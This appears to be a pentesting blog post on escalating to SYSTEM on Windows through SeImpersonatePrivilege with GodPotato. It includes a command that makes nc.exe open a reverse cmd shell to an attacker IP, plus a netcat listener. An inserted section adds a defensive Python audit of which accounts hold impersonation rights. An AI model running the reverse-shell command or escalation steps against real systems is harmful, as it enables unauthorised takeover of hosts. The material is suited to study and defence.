SeImpersonate on old Windows Boxes
If you’re like me, when I’m working on a Windows box trying to elevate my privileges and I see “SeImpersonate,” I feel like I just won the Powerball (the American lottery). It’s so easy that even my 3-year-old could do it. Ok, ok, not that easy, but you get the idea. Basically, you just download GodPotato — and that’s it. Unless… we’re dealing with an old Windows box. Those are x86, and these new Potatoes don’t work there. Read ahead — I’ll spill the beans for you. I’ll explain in detail what to do and how to get that juicy NT AUTHORITY\SYSTEM.
SeImpersonate is one of the easiest ways to gain administrative privileges on Windows. You just run whoami /priv, and if you see SeImpersonatePrivilege listed, you upload the right version of GodPotato to the Windows victim along with nc.exe, and boom—you've got a reverse shell with admin privileges. Basically, it goes like this:
.\GodPotato.exe -cmd "c:\users\public\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.179 80"
On Kali, you set up a netcat listener and just grab the shell. I like to use rlwrap for a better shell experience:
sudo rlwrap -cAr nc -lvnp 80
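The same check from the administrator's side, as an added example that is not part of the original post: a Python script that reads a user-rights export produced on the host with secedit /export /cfg and lists every principal granted SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, flagging any that go beyond the stock defaults. The export text embedded below is constructed for the example, and the long S-1-5-21-... SID in it is a placeholder for a domain account.

```python
"""Audit which principals hold the token rights the Potato family abuses
(SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege).

Input is the text of a user-rights export made on the host with:
    secedit /export /cfg C:\\rights.inf /areas USER_RIGHTS
Real exports are UTF-16 on disk; read them with encoding="utf-16".
SAMPLE_EXPORT below is constructed for this example; the S-1-5-21-... SID
is a placeholder standing in for a domain account someone added by hand.
"""

# Display names for the SIDs that hold these rights on a stock install.
# SERVICE (S-1-5-6) is the one that matters: every service account, IIS
# application pool and SQL Server identity inherits the right through it.
WELL_KNOWN_SIDS = {
    "S-1-5-6": "NT AUTHORITY\\SERVICE",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}

# Default holders per privilege, as Microsoft ships them.
DEFAULT_HOLDERS = {
    "SeImpersonatePrivilege": {"S-1-5-32-544", "S-1-5-6", "S-1-5-19", "S-1-5-20"},
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
}

# Constructed sample of what secedit writes (real files are UTF-16).
SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
SeDebugPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text):
    """Return {privilege: [holder, ...]} from the [Privilege Rights] section.

    secedit prefixes SIDs with '*'; plain account names can also appear,
    so the prefix is stripped and everything else is kept verbatim.
    """
    rights = {}
    in_section = False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        holders = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
        rights[name.strip()] = holders
    return rights


def resolve(sid_or_name):
    """Map a well-known SID to its display name; leave anything else unchanged."""
    return WELL_KNOWN_SIDS.get(sid_or_name, sid_or_name)


def audit_impersonation(inf_text):
    """For each token privilege, list all holders and those beyond the default
    set. A non-empty 'non_default' list means the right was widened by hand,
    which deserves a ticket regardless of which Potato is in fashion.
    """
    rights = parse_privilege_rights(inf_text)
    report = {}
    for priv, defaults in DEFAULT_HOLDERS.items():
        holders = rights.get(priv, [])
        report[priv] = {
            "holders": [resolve(h) for h in holders],
            "non_default": [resolve(h) for h in holders if h not in defaults],
        }
    return report


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-16") as fh:
            text = fh.read()
    else:
        text = SAMPLE_EXPORT
    for priv, info in audit_impersonation(text).items():
        print(f"{priv}: {', '.join(info['holders']) or '(nobody)'}")
        if info["non_default"]:
            print(f"  non-default holders: {', '.join(info['non_default'])}")
```

The point of the report is that even a clean result still includes NT AUTHORITY\SERVICE, which is why any network-facing service running under a service account is the usual starting point for this class of escalation; the audit tells you who else was added, and the rest is patch level and choosing which identity exposed services run under.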
The problem is, this won’t work on old Windows versions — Windows 2008, Windows 7, etc. So, what are you gonna do? You’re one step away from pwning the box. You know how. You just need the right Potato.